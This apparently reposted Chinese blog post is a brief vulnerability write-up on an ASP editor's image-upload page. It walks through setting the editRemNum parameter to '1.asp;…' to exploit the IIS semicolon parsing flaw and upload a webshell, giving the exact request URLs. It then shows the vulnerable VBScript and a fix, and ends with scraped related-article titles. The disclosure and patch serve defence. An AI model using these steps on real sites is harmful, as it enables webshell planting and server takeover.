简单说下利用的方法吧。
点击图片上传后会出现上传页面,地址为

http://www.xxx.cn/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=

用普通的图片上传后,地址为
http://www.xxx.cn/news/admin/uploadPic.asp?language=&editImageNum=1&editRemNum=41513102009204012

很明显。图片的地址是根据RemNum后面的编号生成的。

利用很简单 配合IIS的解析漏洞,把RemNum后面的数据修改为1.asp;41513102009204012

变成下面这个地址

http://www.xxx.cn/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=1.asp;41513102009204012

然后在浏览器里打开

然后选择你的脚本***上传

将会返回下面的地址
uppic/1.asp;41513102009204012_2.gif

然后直接打开就是我们的小马地址!

[红科网安]漏洞修补建议:

关键代码:

if editRemNum<>"" then                
                remNum = editRemNum
             else
                Randomize
                remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)
             end if
             remFileName = remNum&"_"&(editImageNum+1)&".gif"
          end if

去掉自定义部分,只留下随机参数即可。

保留代码:

Randomize
                remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)
             end if
             remFileName = remNum&"_"&(editImageNum+1)&".gif"

文章如转载,请注明转载自【网管小王的独立博客】:http://www.5iadmin.com/

转载于:https://blog.51cto.com/shanzhai/924615

MSN Editor 0DAY相关推荐

  1. ue编辑器漏洞_编辑器漏洞手册

    简介 #2014年8月21日 最初的手册版本,是由北洋贱队的各位朋友收集整理.时隔4年,我们再次整理了这些文件.目的是希望这种传统能延续下去.我们相信:星星之火可以燎原.希望大家能多提建议,完善这份手 ...

  2. Editors Vulnerability Handbook

    创建这样一个文档是为了能够使得众多需要得到帮助的人们,在她们最为困苦之时找到为自己点亮的那盏明灯,虽然这将揭示了某个寂静黑夜下一群躁动不安的人群.他们在享受快感,享受H4ck W0r|d带给他们的一切 ...

  3. 微软9月补丁星期二值得关注的0day、终于落幕的 PrintNightmare及其它

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 北京时间2021年9月15日,微软发布补丁星期二,共修复了66个CVE漏洞,加上月初发布的基于 Chromium 的 Edge 浏览器的20个漏 ...

  4. 微软警告:Office 已遭IE RCE 新0day 攻击

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 今天早些时候,微软安全团队发布警告称,IE 新 0day 已遭滥用.该漏洞的编号为 CVE-2021-40444,影响微软 MHTML即IE浏览 ...

  5. 微软:确实存在另一枚 print spooler 0day,目前尚未修复

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 微软为另外一个 Windows Print Spooler 0day 漏洞发布安全公告.该漏洞编号为 CVE-2021-36958,可导致攻击者 ...

  6. 0day安全:软件漏洞分析技术(第2版)

    0day安全:软件漏洞分析技术(第2版) 基本信息 作者:王清   张东辉   周浩   王继刚   赵双 丛书名:安全技术大系 出版社:电子工业出版社 ISBN:9787121133961 上架时间 ...

  7. 关注MSN聊天机器人颁奖典礼(转)

    关注MSN聊天机器人颁奖典礼(转) 看着那些调皮机智.滔滔不绝的聊天记录,谁能想到这背后只是冷冰冰的代码呢?!MSN Messenger的聊天机器人很多,想要了解哪些最优秀吗?那就来看看这个颁奖典礼吧 ...

  8. MSN Messenger聊天机器人颁奖典礼

    查看:[大字体 中字体 小字体] <script language="javascript" src="ads/newsad2.js"></s ...

  9. 《0day安全:软件漏洞分析技术第二版》

    简单说来,这次再版的原因有二: 首先,国人深知与时俱进的道理,技术上面更是如此.随着windows平台保护技术的不断改进,win7的广泛使用,第一版中所述的很多方法已有较大局 限.为此我们逐一搜集了近 ...

最新文章

  1. 用于计算机视觉领域的python第三方库是什么_大量Python开源第三方库资源分类整理,含菜鸟教程章节级别链接...
  2. 树莓派和windows的FileZillla文件共享,补充:树莓派图形Xrdp界面登录
  3. CF、FM、DSSM、DeepFM等这些推荐模型的原理以及使用场景是什么?
  4. 动态规划算法-04最长递增子序列问题
  5. 工业以太网交换机的软件故障
  6. 谷歌更新TensorFlow目标检测API
  7. [C++]二维数组还是一维数组?
  8. 如何使用nacos配置中心统一管理配置
  9. 妙盈科技:ESG数据提供商获融资
  10. 滴滴再曝收费不靠谱:去程19元 回时164.8元
  11. 固态硬盘(samsung SSD 850 pro)相关问题
  12. 威富通对账单下载并且解析为对象列表展示
  13. zencart模板如何设计
  14. 强世功:中美“关键十年” ——“新罗马帝国”与“新的伟大斗争”
  15. 如何快速为视频添加ai字幕的解决方案
  16. 【Fragment】FragmentManager和FragmentTransaction使用
  17. Android 动态代理以及利用动态代理实现 ServiceHook
  18. labview中java联合编程_LabVIEW编程还可以这么简单?五大总结助你事半功倍!
  19. 计算机设备制造,制造计算机设备
  20. 网吧管理系统(javafx)

热门文章

  1. spring中bean的两种注入方式
  2. 重新上课,学习HTML的第一天
  3. #pragma multi_compile_fwdbase会增加很多个shader variants
  4. Python编程快速上手-字典
  5. No overload for 'OnStartup' matches delegate 'System.Windows.StartupEventHandler'
  6. 判断list集合不为空
  7. Spring AOP capabilities and goals
  8. CPU profiling
  9. BZOJ1798: [Ahoi2009]Seq 维护序列seq
  10. tcp ip协议笔记(1)——简单介绍